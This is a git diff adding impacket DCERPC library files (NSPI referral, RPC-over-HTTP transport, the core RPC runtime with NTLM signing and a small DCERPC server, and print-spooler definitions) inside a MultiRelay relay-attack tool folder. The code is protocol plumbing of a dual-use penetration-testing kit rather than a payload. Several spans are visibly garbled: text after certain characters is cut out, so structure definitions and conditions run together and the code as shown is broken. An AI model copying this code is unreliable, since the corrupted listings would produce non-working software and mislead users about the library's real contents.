+ resp = dce.request(request)
+ return resp
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/oxabref.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/oxabref.py
new file mode 100644
index 0000000..febf77c
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/oxabref.py
@@ -0,0 +1,131 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+# [MS-OXABREF]: Address Book Name Service Provider Interface (NSPI) Referral Protocol
+#
+# Authors:
+# Arseniy Sharoglazov / Positive Technologies (https://www.ptsecurity.com/)
+#
+
+from impacket import hresult_errors, mapi_constants
+from impacket.dcerpc.v5.dtypes import NULL, STR, ULONG
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_OXABREF = uuidtup_to_bin(('1544F5E0-613C-11D1-93DF-00C04FD7BD09','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in mapi_constants.ERROR_MESSAGES:
+ error_msg_short = mapi_constants.ERROR_MESSAGES[key]
+ return 'OXABREF SessionError: code: 0x%x - %s' % (self.error_code, error_msg_short)
+ elif key in hresult_errors.ERROR_MESSAGES:
+ error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+ return 'OXABREF SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'OXABREF SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# STRUCTURES
+################################################################################
+class PUCHAR_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', STR),
+ )
+
+class PPUCHAR_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', PUCHAR_ARRAY),
+ )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# 3.1.4.1 RfrGetNewDSA (opnum 0)
+class RfrGetNewDSA(NDRCALL):
+ opnum = 0
+ structure = (
+ ('ulFlags', ULONG),
+ ('pUserDN', STR),
+ ('ppszUnused', PPUCHAR_ARRAY),
+ ('ppszServer', PPUCHAR_ARRAY),
+ )
+
+class RfrGetNewDSAResponse(NDRCALL):
+ structure = (
+ ('ppszUnused', PPUCHAR_ARRAY),
+ ('ppszServer', PPUCHAR_ARRAY),
+ )
+
+# 3.1.4.2 RfrGetFQDNFromServerDN (opnum 1)
+class RfrGetFQDNFromServerDN(NDRCALL):
+ opnum = 1
+ structure = (
+ ('ulFlags', ULONG),
+ ('cbMailboxServerDN', ULONG),
+ ('szMailboxServerDN', STR),
+ )
+
+class RfrGetFQDNFromServerDNResponse(NDRCALL):
+ structure = (
+ ('ppszServerFQDN', PUCHAR_ARRAY),
+ ('ErrorCode', ULONG),
+ )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (RfrGetNewDSA, RfrGetNewDSAResponse),
+ 1 : (RfrGetFQDNFromServerDN, RfrGetFQDNFromServerDNResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+ if string == NULL:
+ return string
+
+ if string[-1:] != '\x00':
+ return string + '\x00'
+ else:
+ return string
+
+def hRfrGetNewDSA(dce, pUserDN=''):
+ request = RfrGetNewDSA()
+ request['ulFlags'] = 0
+ request['pUserDN'] = checkNullString(pUserDN)
+ request['ppszUnused'] = NULL
+ request['ppszServer'] = '\x00'
+
+ resp = dce.request(request)
+ resp['ppszServer'] = resp['ppszServer'][:-1]
+
+ if request['ppszUnused'] != NULL:
+ resp['ppszUnused'] = resp['ppszUnused'][:-1]
+
+ return resp
+
+def hRfrGetFQDNFromServerDN(dce, szMailboxServerDN):
+ szMailboxServerDN = checkNullString(szMailboxServerDN)
+ request = RfrGetFQDNFromServerDN()
+ request['ulFlags'] = 0
+ request['szMailboxServerDN'] = szMailboxServerDN
+ request['cbMailboxServerDN'] = len(szMailboxServerDN)
+
+ resp = dce.request(request)
+ resp['ppszServerFQDN'] = resp['ppszServerFQDN'][:-1]
+
+ return resp
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rpch.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rpch.py
new file mode 100644
index 0000000..ea0938b
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rpch.py
@@ -0,0 +1,846 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+# Initial [MS-RCPH] Interface implementation
+#
+# Authors:
+# Arseniy Sharoglazov / Positive Technologies (https://www.ptsecurity.com/)
+#
+
+import re
+import binascii
+from struct import unpack
+
+from impacket import uuid, ntlm, system_errors, nt_errors, LOG
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+from impacket.uuid import EMPTY_UUID
+from impacket.http import HTTPClientSecurityProvider, AUTH_BASIC
+from impacket.structure import Structure
+from impacket.dcerpc.v5.rpcrt import MSRPCHeader, \
+ MSRPC_RTS, PFC_FIRST_FRAG, PFC_LAST_FRAG
+
+class RPCProxyClientException(DCERPCException):
+ parser = re.compile(r'RPC Error: ([a-fA-F0-9]{1,8})')
+
+ def __init__(self, error_string=None, proxy_error=None):
+ rpc_error_code = None
+
+ if proxy_error is not None:
+ try:
+ search = self.parser.search(proxy_error)
+ rpc_error_code = int(search.group(1), 16)
+ except:
+ error_string += ': ' + proxy_error
+
+ DCERPCException.__init__(self, error_string, rpc_error_code)
+
+ def __str__(self):
+ if self.error_code is not None:
+ key = self.error_code
+ if key in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+ return '%s, code: 0x%x - %s' % (self.error_string, self.error_code, error_msg_short)
+ elif key in nt_errors.ERROR_MESSAGES:
+ error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+ return '%s, code: 0x%x - %s' % (self.error_string, self.error_code, error_msg_short)
+ else:
+ return '%s: unknown code: 0x%x' % (self.error_string, self.error_code)
+ else:
+ return self.error_string
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+RPC_OVER_HTTP_v1 = 1
+RPC_OVER_HTTP_v2 = 2
+
+# Errors which might need handling
+
+# RPCProxyClient internal errors
+RPC_PROXY_REMOTE_NAME_NEEDED_ERR = 'Basic authentication in RPC proxy is used, ' \
+ 'so coudn\'t obtain a target NetBIOS name from NTLMSSP to connect.'
+
+# Errors below contain a part of server responses
+RPC_PROXY_INVALID_RPC_PORT_ERR = 'Invalid RPC Port'
+RPC_PROXY_CONN_A1_0X6BA_ERR = 'RPC Proxy CONN/A1 request failed, code: 0x6ba'
+RPC_PROXY_CONN_A1_404_ERR = 'CONN/A1 request failed: HTTP/1.1 404 Not Found'
+RPC_PROXY_RPC_OUT_DATA_404_ERR = 'RPC_OUT_DATA channel: HTTP/1.1 404 Not Found'
+RPC_PROXY_CONN_A1_401_ERR = 'CONN/A1 request failed: HTTP/1.1 401 Unauthorized'
+RPC_PROXY_HTTP_IN_DATA_401_ERR = 'RPC_IN_DATA channel: HTTP/1.1 401 Unauthorized'
+
+
+# 2.2.3.3 Forward Destinations
+FDClient = 0x00000000
+FDInProxy = 0x00000001
+FDServer = 0x00000002
+FDOutProxy = 0x00000003
+
+RTS_FLAG_NONE = 0x0000
+RTS_FLAG_PING = 0x0001
+RTS_FLAG_OTHER_CMD = 0x0002
+RTS_FLAG_RECYCLE_CHANNEL = 0x0004
+RTS_FLAG_IN_CHANNEL = 0x0008
+RTS_FLAG_OUT_CHANNEL = 0x0010
+RTS_FLAG_EOF = 0x0020
+RTS_FLAG_ECHO = 0x0040
+
+# 2.2.3.5 RTS Commands
+RTS_CMD_RECEIVE_WINDOW_SIZE = 0x00000000
+RTS_CMD_FLOW_CONTROL_ACK = 0x00000001
+RTS_CMD_CONNECTION_TIMEOUT = 0x00000002
+RTS_CMD_COOKIE = 0x00000003
+RTS_CMD_CHANNEL_LIFETIME = 0x00000004
+RTS_CMD_CLIENT_KEEPALIVE = 0x00000005
+RTS_CMD_VERSION = 0x00000006
+RTS_CMD_EMPTY = 0x00000007
+RTS_CMD_PADDING = 0x00000008
+RTS_CMD_NEGATIVE_ANCE = 0x00000009
+RTS_CMD_ANCE = 0x0000000A
+RTS_CMD_CLIENT_ADDRESS = 0x0000000B
+RTS_CMD_ASSOCIATION_GROUP_ID = 0x0000000C
+RTS_CMD_DESTINATION = 0x0000000D
+RTS_CMD_PING_TRAFFIC_SENT_NOTIFY = 0x0000000E
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+# 2.2.3.1 RTS Cookie
+class RTSCookie(Structure):
+ structure = (
+ ('Cookie','16s=b"\\x00"*16'),
+ )
+
+# 2.2.3.2 Client Address
+class EncodedClientAddress(Structure):
+ structure = (
+ ('AddressType',' 0:
+ buffer = self.__readBuffer
+ self.__readBuffer = b''
+ else:
+ # Let's read RECV_SIZE bytes and not amt bytes.
+ # We would need to check the answer for HTTP errors, as
+ # they can just appear in the middle of the stream.
+ buffer = sock.recv(self.RECV_SIZE)
+
+ self.check_http_error(buffer)
+
+ if len(buffer) <= amt:
+ return buffer
+
+ # We received more than we need
+ self.__readBuffer = buffer[amt:]
+ return buffer[:amt]
+
+ # Check if the previous chunk is still there
+ if self.__chunkLeft > 0:
+ # If the previous chunk is still there,
+ # just give the caller what we already have
+ if amt >= self.__chunkLeft:
+ buffer = self.__readBuffer[:self.__chunkLeft]
+ # We may have recieved a part of a new chunk
+ self.__readBuffer = self.__readBuffer[self.__chunkLeft + 2:]
+ self.__chunkLeft = 0
+
+ return buffer
+ else:
+ buffer = self.__readBuffer[:amt]
+ self.__readBuffer = self.__readBuffer[amt:]
+ self.__chunkLeft -= amt
+
+ return buffer
+
+ # Let's start to process a new chunk
+ buffer = self.__readBuffer
+ self.__readBuffer = b''
+
+ self.check_http_error(buffer)
+
+ # Let's receive a chunk size field which ends with CRLF
+ # For Microsoft TMG 2010 it can cause more than one read
+ while buffer.find(b'\r\n') == -1:
+ buffer += sock.recv(self.RECV_SIZE)
+ self.check_http_error(buffer)
+
+ chunksize = int(buffer[:buffer.find(b'\r\n')], 16)
+ buffer = buffer[buffer.find(b'\r\n') + 2:]
+
+ # Let's read at least our chunk including final CRLF
+ while len(buffer) - 2 < chunksize:
+ buffer += sock.recv(chunksize - len(buffer) + 2)
+
+ # We should not be using any information from
+ # the TCP level to determine HTTP boundaries.
+ # So, we may have received more than we need.
+ if len(buffer) - 2 > chunksize:
+ self.__readBuffer = buffer[chunksize + 2:]
+ buffer = buffer[:chunksize + 2]
+
+ # Checking the amt
+ if len(buffer) - 2 > amt:
+ self.__chunkLeft = chunksize - amt
+ # We may have recieved a part of a new chunk before,
+ # so the concatenation is crucual
+ self.__readBuffer = buffer[amt:] + self.__readBuffer
+
+ return buffer[:amt]
+ else:
+ # Removing CRLF
+ return buffer[:-2]
+
+ def send(self, data, forceWriteAndx=0, forceRecv=0):
+ # We don't use chunked encoding for IN channel as
+ # Microsoft software is developed this way.
+ # If you do this, it may fail.
+ self.get_socket_in().send(data)
+
+ def rpc_out_read_pkt(self, handle_rts=False):
+ while True:
+ response_data = b''
+
+ # Let's receive common RPC header and no more
+ #
+ # C706
+ # 12.4 Common Fields
+ # Header encodings differ between connectionless and connection-oriented PDUs.
+ # However, certain fields use common sets of values with a consistent
+ # interpretation across the two protocols.
+ #
+ # This MUST recv MSRPCHeader._SIZE bytes, and not MSRPCRespHeader._SIZE bytes!
+ #
+ while len(response_data) < MSRPCHeader._SIZE:
+ response_data += self.rpc_out_recv1(MSRPCHeader._SIZE - len(response_data))
+
+ response_header = MSRPCHeader(response_data)
+
+ # frag_len contains the full length of the packet for both
+ # MSRPC and RTS
+ frag_len = response_header['frag_len']
+
+ # Receiving the full pkt and no more
+ while len(response_data) < frag_len:
+ response_data += self.rpc_out_recv1(frag_len - len(response_data))
+
+ # We need to do the Flow Control procedures
+ #
+ # 3.2.1.1.4
+ # This protocol specifies that only RPC PDUs are subject to the flow control abstract data
+ # model. RTS PDUs and the HTTP request and response headers are not subject to flow control.
+ if response_header['type'] != MSRPC_RTS:
+ self.flow_control(frag_len)
+
+ if handle_rts is True and response_header['type'] == MSRPC_RTS:
+ self.handle_out_of_sequence_rts(response_data)
+ else:
+ return response_data
+
+ def recv(self, forceRecv=0, count=0):
+ return self.rpc_out_read_pkt(handle_rts=True)
+
+ def handle_out_of_sequence_rts(self, response_data):
+ packet = RTSHeader(response_data)
+
+ #print("=========== RTS PKT ===========")
+ #print("RAW: %s" % binascii.hexlify(response_data))
+ #packet.dump()
+ #
+ #pduData = packet['pduData']
+ #numberOfCommands = packet['NumberOfCommands']
+ #
+ #server_cmds = []
+ #while numberOfCommands > 0:
+ # numberOfCommands -= 1
+ #
+ # cmd_type = unpack(' 0 else 0)+len(pduData)+len(pad)+len(sec_trailer)'), # 8
+ ('auth_len',' 0 else 0)'),
+ ('pduData',':'),
+ ('_pad', '_-pad','(4 - ((self._SIZE + (16 if (self["flags"] & 0x80) > 0 else 0) + len(self["pduData"])) & 3) & 3)'),
+ ('pad', ':'),
+ ('_sec_trailer', '_-sec_trailer', '8 if self["auth_len"] > 0 else 0'),
+ ('sec_trailer',':'),
+ ('auth_dataLen','_-auth_data','self["auth_len"]'),
+ ('auth_data',':'),
+ )
+
+ def __init__(self, data = None, alignment = 0):
+ Structure.__init__(self,data, alignment)
+ if data is None:
+ self['ver_major'] = 5
+ self['ver_minor'] = 0
+ self['flags'] = PFC_FIRST_FRAG | PFC_LAST_FRAG
+ self['type'] = MSRPC_REQUEST
+ self.__frag_len_set = 0
+ self['auth_len'] = 0
+ self['pduData'] = b''
+ self['auth_data'] = b''
+ self['sec_trailer'] = b''
+ self['pad'] = b''
+
+ def get_header_size(self):
+ return self._SIZE + (16 if (self["flags"] & PFC_OBJECT_UUID) > 0 else 0)
+
+ def get_packet(self):
+ if self['auth_data'] != b'':
+ self['auth_len'] = len(self['auth_data'])
+ # The sec_trailer structure MUST be 4-byte aligned with respect to
+ # the beginning of the PDU. Padding octets MUST be used to align the
+ # sec_trailer structure if its natural beginning is not already 4-byte aligned
+ ##self['pad'] = '\xAA' * (4 - ((self._SIZE + len(self['pduData'])) & 3) & 3)
+
+ return self.getData()
+
+class MSRPCRequestHeader(MSRPCHeader):
+ _SIZE = 24
+ commonHdr = MSRPCHeader.commonHdr + (
+ ('alloc_hint',' 0 else 0' ), # 22
+ ('uuid',':'), # 22
+ )
+
+ def __init__(self, data = None, alignment = 0):
+ MSRPCHeader.__init__(self, data, alignment)
+ if data is None:
+ self['type'] = MSRPC_REQUEST
+ self['ctx_id'] = 0
+ self['uuid'] = b''
+
+class MSRPCRespHeader(MSRPCHeader):
+ _SIZE = 24
+ commonHdr = MSRPCHeader.commonHdr + (
+ ('alloc_hint',' 0 else 0'),
+ ('sec_trailer',':'),
+ ('auth_dataLen','_-auth_data','self["auth_len"]'),
+ ('auth_data',':'),
+ )
+ def __init__(self, data = None, alignment = 0):
+ self.__ctx_items = []
+ MSRPCHeader.__init__(self,data,alignment)
+ if data is None:
+ self['Pad'] = b''
+ self['ctx_items'] = b''
+ self['sec_trailer'] = b''
+ self['auth_data'] = b''
+
+ def getCtxItems(self):
+ return self.__ctx_items
+
+ def getCtxItem(self,index):
+ return self.__ctx_items[index-1]
+
+ def fromString(self, data):
+ Structure.fromString(self,data)
+ # Parse the ctx_items
+ data = self['ctx_items']
+ for i in range(self['ctx_num']):
+ item = CtxItemResult(data)
+ self.__ctx_items.append(item)
+ data = data[len(item):]
+
+class MSRPCBindNak(Structure):
+ structure = (
+ ('RejectedReason',' 0:
+ # User set a frag size, let's compare it with the max transmit size agreed when binding the interface
+ fragment_size = min(self._max_user_frag, self.__max_xmit_size)
+ else:
+ fragment_size = self.__max_xmit_size
+
+ # Sanity check. Fragmentation can't be too low, otherwise sec_trailer won't fit
+
+ if self.__auth_level in [RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY]:
+ if fragment_size <= 8:
+ # Minimum pdu fragment size is 8, important when doing PKT_INTEGRITY/PRIVACY. We need a minimum size of 8
+ # (Kerberos)
+ fragment_size = 8
+
+ # ToDo: Better calculate the size needed. Now I'm setting a number that surely is enough for Kerberos and NTLM
+ # ToDo: trailers, both for INTEGRITY and PRIVACY. This means we're not truly honoring the user's frag request.
+ if len(data['pduData']) + 128 > fragment_size:
+ should_fragment = True
+ if fragment_size+128 > self.__max_xmit_size:
+ fragment_size = self.__max_xmit_size - 128
+
+ if should_fragment:
+ packet = data['pduData']
+ offset = 0
+
+ while 1:
+ toSend = packet[offset:offset+fragment_size]
+ if not toSend:
+ break
+ if offset == 0:
+ data['flags'] |= PFC_FIRST_FRAG
+ else:
+ data['flags'] &= (~PFC_FIRST_FRAG)
+ offset += len(toSend)
+ if offset >= len(packet):
+ data['flags'] |= PFC_LAST_FRAG
+ else:
+ data['flags'] &= (~PFC_LAST_FRAG)
+ data['pduData'] = toSend
+ self._transport_send(data, forceWriteAndx = 1, forceRecv =data['flags'] & PFC_LAST_FRAG)
+ else:
+ self._transport_send(data)
+ self.__callid += 1
+
+ def recv(self):
+ finished = False
+ forceRecv = 0
+ retAnswer = b''
+ while not finished:
+ # At least give me the MSRPCRespHeader, especially important for
+ # TCP/UDP Transports
+ response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
+ response_header = MSRPCRespHeader(response_data)
+ # Ok, there might be situation, especially with large packets, that
+ # the transport layer didn't send us the full packet's contents
+ # So we gotta check we received it all
+ while len(response_data) < response_header['frag_len']:
+ response_data += self._transport.recv(forceRecv, count=(response_header['frag_len']-len(response_data)))
+
+ off = response_header.get_header_size()
+
+ if response_header['type'] == MSRPC_FAULT and response_header['frag_len'] >= off+4:
+ status_code = unpack(" 0:
+ answer, cfounder = self.__gss.GSS_Unwrap(self.__sessionKey, answer, self.__sequence,
+ direction='init', authData=auth_data)
+
+ elif sec_trailer['auth_level'] == RPC_C_AUTHN_LEVEL_PKT_INTEGRITY:
+ if self.__auth_type == RPC_C_AUTHN_WINNT:
+ ntlmssp = auth_data[12:]
+ if self.__flags & ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+ signature = ntlm.SIGN(self.__flags,
+ self.__serverSigningKey,
+ answer,
+ self.__sequence,
+ self.__serverSealingHandle)
+ else:
+ signature = ntlm.SIGN(self.__flags,
+ self.__serverSigningKey,
+ ntlmssp,
+ self.__sequence,
+ self.__serverSealingHandle)
+ # Yes.. NTLM2 doesn't increment sequence when receiving
+ # the packet :P
+ self.__sequence += 1
+ elif self.__auth_type == RPC_C_AUTHN_NETLOGON:
+ from impacket.dcerpc.v5 import nrpc
+ ntlmssp = auth_data[12:]
+ signature = nrpc.SIGN(ntlmssp,
+ self.__confounder,
+ self.__sequence,
+ self.__sessionKey,
+ False)
+ self.__sequence += 1
+ elif self.__auth_type == RPC_C_AUTHN_GSS_NEGOTIATE:
+ # Do NOT increment the sequence number when Signing Kerberos
+ #self.__sequence += 1
+ pass
+
+
+ if sec_trailer['auth_pad_len']:
+ answer = answer[:-sec_trailer['auth_pad_len']]
+
+ retAnswer += answer
+ return retAnswer
+
+ def alter_ctx(self, newUID, bogus_binds = 0):
+ answer = self.__class__(self._transport)
+
+ answer.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
+ self.__aesKey, self.__TGT, self.__TGS)
+ answer.set_auth_type(self.__auth_type)
+ answer.set_auth_level(self.__auth_level)
+
+ answer.set_ctx_id(self._ctx+1)
+ answer.__callid = self.__callid
+ answer.bind(newUID, alter = 1, bogus_binds = bogus_binds, transfer_syntax = bin_to_uuidtup(self.transfer_syntax))
+ return answer
+
+class DCERPC_RawCall(MSRPCRequestHeader):
+ def __init__(self, op_num, data = b'', uuid=None):
+ MSRPCRequestHeader.__init__(self)
+ self['op_num'] = op_num
+ self['pduData'] = data
+ if uuid is not None:
+ self['flags'] |= PFC_OBJECT_UUID
+ self['uuid'] = uuid
+
+ def setData(self, data):
+ self['pduData'] = data
+
+# 2.2.6 Type Serialization Version 1
+class CommonHeader(NDRSTRUCT):
+ structure = (
+ ('Version', UCHAR),
+ ('Endianness', UCHAR),
+ ('CommonHeaderLength', USHORT),
+ ('Filler', ULONG),
+ )
+ def __init__(self, data = None,isNDR64 = False):
+ NDRSTRUCT.__init__(self, data, isNDR64)
+ if data is None:
+ self['Version'] = 1
+ self['Endianness'] = 0x10
+ self['CommonHeaderLength'] = 8
+ self['Filler'] = 0xcccccccc
+
+class PrivateHeader(NDRSTRUCT):
+ structure = (
+ ('ObjectBufferLength', ULONG),
+ ('Filler', ULONG),
+ )
+ def __init__(self, data = None,isNDR64 = False):
+ NDRSTRUCT.__init__(self, data, isNDR64)
+ if data is None:
+ self['Filler'] = 0xcccccccc
+
+class TypeSerialization1(NDRSTRUCT):
+ commonHdr = (
+ ('CommonHeader', CommonHeader),
+ ('PrivateHeader', PrivateHeader),
+ )
+ def getData(self, soFar = 0):
+ self['PrivateHeader']['ObjectBufferLength'] = len(NDRSTRUCT.getData(self, soFar)) + len(
+ NDRSTRUCT.getDataReferents(self, soFar)) - len(self['CommonHeader']) - len(self['PrivateHeader'])
+ return NDRSTRUCT.getData(self, soFar)
+
+class DCERPCServer(Thread):
+ """
+ A minimalistic DCERPC Server, mainly used by the smbserver, for now. Might be useful
+ for other purposes in the future, but we should do it way stronger.
+ If you want to implement a DCE Interface Server, use this class as the base class
+ """
+ def __init__(self):
+ Thread.__init__(self)
+ self._listenPort = 0
+ self._listenAddress = '127.0.0.1'
+ self._listenUUIDS = {}
+ self._boundUUID = b''
+ self._sock = None
+ self._clientSock = None
+ self._callid = 1
+ self._max_frag = None
+ self._max_xmit_size = 4280
+ self.__log = LOG
+ self._sock = socket.socket()
+ self._sock.bind((self._listenAddress,self._listenPort))
+
+ def log(self, msg, level=logging.INFO):
+ self.__log.log(level,msg)
+
+ def addCallbacks(self, ifaceUUID, secondaryAddr, callbacks):
+ """
+ adds a call back to a UUID/opnum call
+
+ :param uuid ifaceUUID: the interface UUID
+ :param string secondaryAddr: the secondary address to answer as part of the bind request (e.g. \\\\PIPE\\\\srvsvc)
+ :param dict callbacks: the callbacks for each opnum. Format is [opnum] = callback
+ """
+ self._listenUUIDS[uuidtup_to_bin(ifaceUUID)] = {}
+ self._listenUUIDS[uuidtup_to_bin(ifaceUUID)]['SecondaryAddr'] = secondaryAddr
+ self._listenUUIDS[uuidtup_to_bin(ifaceUUID)]['CallBacks'] = callbacks
+ self.log("Callback added for UUID %s V:%s" % ifaceUUID)
+
+ def setListenPort(self, portNum):
+ self._listenPort = portNum
+ self._sock = socket.socket()
+ self._sock.bind((self._listenAddress,self._listenPort))
+
+ def getListenPort(self):
+ return self._sock.getsockname()[1]
+
+ def recv(self):
+ finished = False
+ retAnswer = b''
+ response_data = b''
+ while not finished:
+ # At least give me the MSRPCRespHeader, especially important for TCP/UDP Transports
+ response_data = self._clientSock.recv(MSRPCRespHeader._SIZE)
+ # No data?, connection might have closed
+ if response_data == b'':
+ return None
+ response_header = MSRPCRespHeader(response_data)
+ # Ok, there might be situation, especially with large packets,
+ # that the transport layer didn't send us the full packet's contents
+ # So we gotta check we received it all
+ while len(response_data) < response_header['frag_len']:
+ response_data += self._clientSock.recv(response_header['frag_len']-len(response_data))
+ response_header = MSRPCRespHeader(response_data)
+ if response_header['flags'] & PFC_LAST_FRAG:
+ # No need to reassembly DCERPC
+ finished = True
+ answer = response_header['pduData']
+ auth_len = response_header['auth_len']
+ if auth_len:
+ auth_len += 8
+ auth_data = answer[-auth_len:]
+ sec_trailer = SEC_TRAILER(data = auth_data)
+ answer = answer[:-auth_len]
+ if sec_trailer['auth_pad_len']:
+ answer = answer[:-sec_trailer['auth_pad_len']]
+
+ retAnswer += answer
+ return response_data
+
+ def run(self):
+ self._sock.listen(10)
+ while True:
+ self._clientSock, address = self._sock.accept()
+ try:
+ while True:
+ data = self.recv()
+ if data is None:
+ # No data.. connection closed
+ break
+ answer = self.processRequest(data)
+ if answer is not None:
+ self.send(answer)
+ except Exception:
+ #import traceback
+ #traceback.print_exc()
+ pass
+ self._clientSock.close()
+
+ def send(self, data):
+ max_frag = self._max_frag
+ if len(data['pduData']) > self._max_xmit_size - 32:
+ max_frag = self._max_xmit_size - 32 # XXX: 32 is a safe margin for auth data
+
+ if self._max_frag:
+ max_frag = min(max_frag, self._max_frag)
+ if max_frag and len(data['pduData']) > 0:
+ packet = data['pduData']
+ offset = 0
+ while 1:
+ toSend = packet[offset:offset+max_frag]
+ if not toSend:
+ break
+ flags = 0
+ if offset == 0:
+ flags |= PFC_FIRST_FRAG
+ offset += len(toSend)
+ if offset == len(packet):
+ flags |= PFC_LAST_FRAG
+ data['flags'] = flags
+ data['pduData'] = toSend
+ self._clientSock.send(data.get_packet())
+ else:
+ self._clientSock.send(data.get_packet())
+ self._callid += 1
+
+ def bind(self,packet, bind):
+ # Standard NDR Representation
+ NDRSyntax = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0')
+ resp = MSRPCBindAck()
+
+ resp['type'] = MSRPC_BINDACK
+ resp['flags'] = packet['flags']
+ resp['frag_len'] = 0
+ resp['auth_len'] = 0
+ resp['auth_data'] = b''
+ resp['call_id'] = packet['call_id']
+ resp['max_tfrag'] = bind['max_tfrag']
+ resp['max_rfrag'] = bind['max_rfrag']
+ resp['assoc_group'] = 0x1234
+ resp['ctx_num'] = 0
+
+ data = bind['ctx_items']
+ ctx_items = b''
+ resp['SecondaryAddrLen'] = 0
+ for i in range(bind['ctx_num']):
+ result = MSRPC_CONT_RESULT_USER_REJECT
+ item = CtxItem(data)
+ data = data[len(item):]
+
+ # First we check the Transfer Syntax is NDR32, what we support
+ if item['TransferSyntax'] == uuidtup_to_bin(NDRSyntax):
+ # Now Check if the interface is what we listen
+ reason = 1 # Default, Abstract Syntax not supported
+ for j in self._listenUUIDS:
+ if item['AbstractSyntax'] == j:
+ # Match, we accept the bind request
+ resp['SecondaryAddr'] = self._listenUUIDS[item['AbstractSyntax']]['SecondaryAddr']
+ resp['SecondaryAddrLen'] = len(resp['SecondaryAddr'])+1
+ reason = 0
+ self._boundUUID = j
+ else:
+ # Fail the bind request for this context
+ reason = 2 # Transfer Syntax not supported
+ if reason == 0:
+ result = MSRPC_CONT_RESULT_ACCEPT
+ if reason == 1:
+ LOG.error('Bind request for an unsupported interface %s' % bin_to_uuidtup(item['AbstractSyntax']))
+
+ resp['ctx_num'] += 1
+ itemResult = CtxItemResult()
+ itemResult['Result'] = result
+ itemResult['Reason'] = reason
+ itemResult['TransferSyntax'] = uuidtup_to_bin(NDRSyntax)
+ ctx_items += itemResult.getData()
+
+ resp['Pad'] ='A'*((4-((resp["SecondaryAddrLen"]+MSRPCBindAck._SIZE) % 4))%4)
+ resp['ctx_items'] = ctx_items
+ resp['frag_len'] = len(resp.getData())
+
+ self._clientSock.send(resp.getData())
+ return None
+
+ def processRequest(self,data):
+ packet = MSRPCHeader(data)
+ if packet['type'] == MSRPC_BIND:
+ bind = MSRPCBind(packet['pduData'])
+ self.bind(packet, bind)
+ packet = None
+ elif packet['type'] == MSRPC_REQUEST:
+ request = MSRPCRequestHeader(data)
+ response = MSRPCRespHeader(data)
+ response['type'] = MSRPC_RESPONSE
+ # Serve the opnum requested, if not, fails
+ if request['op_num'] in self._listenUUIDS[self._boundUUID]['CallBacks']:
+ # Call the function
+ returnData = self._listenUUIDS[self._boundUUID]['CallBacks'][request['op_num']](request['pduData'])
+ response['pduData'] = returnData
+ else:
+ LOG.error('Unsupported DCERPC opnum %d called for interface %s' % (request['op_num'], bin_to_uuidtup(self._boundUUID)))
+ response['type'] = MSRPC_FAULT
+ response['pduData'] = pack('.
+# There are test cases for them too.
+#
+from impacket import system_errors
+from impacket.dcerpc.v5.dtypes import ULONGLONG, UINT, USHORT, LPWSTR, DWORD, ULONG, NULL
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_RPRN = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+ return 'RPRN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'RPRN SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.1.1.7 STRING_HANDLE
+STRING_HANDLE = LPWSTR
+class PSTRING_HANDLE(NDRPOINTER):
+ referent = (
+ ('Data', STRING_HANDLE),
+ )
+
+# 2.2.3.1 Access Values
+JOB_ACCESS_ADMINISTER = 0x00000010
+JOB_ACCESS_READ = 0x00000020
